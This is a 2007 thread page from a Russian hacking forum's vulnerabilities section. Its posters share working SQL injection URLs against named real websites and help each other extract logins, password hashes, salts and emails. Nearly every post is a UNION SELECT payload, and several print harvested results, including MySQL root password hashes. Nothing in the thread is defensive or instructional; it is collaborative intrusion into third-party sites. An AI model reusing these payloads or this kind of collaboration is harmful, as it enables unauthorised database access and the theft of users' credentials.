ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2661  
Старый 08.07.2007, 23:59
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,6,7,8%20from%20users/*
а пароли не нашел
 
Ответить с цитированием

  #2662  
Старый 09.07.2007, 00:18
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Получите - распишитесь

Код:
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,3,4,concat_ws(char(58),username,password,salt,email,icq,skype)+from+vbuser/*
 
Ответить с цитированием

  #2663  
Старый 09.07.2007, 00:24
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Цитата:
Сообщение от kair  
Код:
http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,6,7,8%20from%20users/*
а пароли не нашел
Вот пароль

Код:
http://www.buybrand.ru/rus/index/news?id=-1%20union%20select%201,2,name,4,5,passw,7,8+from%20users/*
 
Ответить с цитированием

  #2664  
Старый 09.07.2007, 09:54
md5f1h
Познающий
Регистрация: 26.01.2007
Сообщений: 46
Провел на форуме:
283785

Репутация: 28
По умолчанию

первые два связаны с la2
http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*
http://www.akatsuki.asturservers.com/open-L2DP/item.php?id=-1+Union+select+1,2,3,TABLE_NAME+from+INFORMATION_S CHEMA.TABLES+LIMIT+2,1/*
http://www.books.bg/Item.php?id=-1+union+select+user()/*
 
Ответить с цитированием

  #2665  
Старый 09.07.2007, 10:13
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Цитата:
http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*
Код:
http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,concat_ws(0x203a20,user,password),3,4,5+from+mysql.user/*
root : 1be122933e65c0f2
;-)
 
Ответить с цитированием

  #2666  
Старый 09.07.2007, 12:39
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Цитата:
http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,id_user, 8,9,10+from+user/*
дальше подобрать не могу... кто сможет с меня ++ (оч надо)...
 
Ответить с цитированием

  #2667  
Старый 09.07.2007, 12:45
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Y.Dmitriy  
дальше подобрать не могу...
Дык
http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,concat(l ogin_user,0x3a,password_user),8,9,10+from+user/*
 
Ответить с цитированием

  #2668  
Старый 09.07.2007, 19:15
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

Код:
http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
root@192.168.0.3:bugs:5.0.18-log
Код:
http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,db),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.db/*
есть база даных; asystem
Код:
http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
root:*97EB633C4A82BD6AE86EB0CA129D2CD0CBF93228
 
Ответить с цитированием

sql
  #2669  
Старый 09.07.2007, 20:07
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Цитата:
http://www.thebiggreen.net/article.php?id=-516+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_i d,username,password,email,access),8,9,0,1+from+bg_ users+limit+0,1/*
(пароли md5 (unix))
 
Ответить с цитированием

  #2670  
Старый 09.07.2007, 21:24
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Цитата:
http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7 ,password,9,10+from+users/*
ПАССЫ В МД5
Цитата:
http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7 ,login,9,10+from+users/*
Логины но почему-то страничка не отвечает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ